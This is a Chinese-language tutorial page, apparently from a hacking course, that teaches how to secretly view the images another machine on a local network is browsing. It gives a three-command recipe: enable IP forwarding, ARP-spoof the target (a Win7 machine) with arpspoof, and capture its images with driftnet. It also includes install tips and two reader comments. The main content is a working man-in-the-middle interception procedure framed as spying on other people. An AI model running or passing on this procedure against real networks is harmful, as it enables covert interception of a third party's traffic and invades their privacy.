0x02 窥探局域网内它人浏览的照片

0x02 窥探局域网内它人浏览的照片

本例主要功能实现的是在局域网内,窥探指定机器的浏览的照片信息,如:百度图片、QQ照册等。

接下来说明一下测试环境中,各个机器的环境及IP地址。

网关:192.168.10.1

被欺骗的机器:Win7 192.168.10.178

Kali : 192.168.10.140

特殊说明一下,本次操作要实现图片的窥探,我们使用的命令,需要使用图形化界面,所以我们直接在Kali中操作。

1. 数据转发

# IP流量转发(echo是不会有回显的)
echo 1 >/proc/sys/net/ipv4/ip_forward

 

2. arp欺骗攻击

这里我们所使用的命令与之前我们所使用的断网攻击是同一个命令,也就是arpspoof,接下来我们直接操作吧。

# ARP欺骗,也是之前的断网攻击
arpspoof -i eth0 -t 192.168.10.178 192.168.10.1

说明:由于新版本的kali Linux已经取消了 arpspoof 工具的使用,所以需要使用“  apt-get install dsniff  ”命令安装一下。

命令中,-i eth0中,eth0为本机的网卡名称,大家需要根据自己的网卡名称对应修改。

命令中,-t 192.168.10.178中,192.168.10.178为被攻击机器的IP。

命令中,192.168.10.1为网关。

3. 获取目标机器的图片

接下来我们要在kali中,重新打开一个命令窗口,之前的窗口不要关闭,命令也不要停止,使用driftnet 来监听网卡。

# 获取图片(欺骗中做操作)
driftnet -i eth0

说明:新版本kali linux 已经取消了drifnet 工具,需要使用 “ apt-get install drifnet ” 安装一下。

在弹出的新窗口中,将其最大化,这样方便我们查看目标机器的图片,如下图所示。

接下来我们就在被欺骗的机器上操作,我们这里打百度图片,来进行测试查看结果。

../../未标题-1.png

 

命令汇总(只有三条命令)

# IP流量转发(echo是不会有回显的) 
echo 1 >/proc/sys/net/ipv4/ip_forward

# ARP欺骗,也是之前的断网攻击 
arpspoof -i eth0 -t 192.168.10.178 192.168.10.1

# 获取图片(欺骗中做操作) 
driftnet -i eth0

 

分享到 :
7.3 定时器应用示例
上一篇 2018-10-18
相关推荐

发表回复

登录... 后才能评论

评论(2)

  • cui_p 游客 2018年12月10日 上午8:44

    都已经断网攻击了,目标机器怎么浏览图片

    • lixh 永久VIP 回复 cui_p 2018年12月11日 下午2:19

      目标机器打开百度图片,或者QQ像册,就可以被看到了。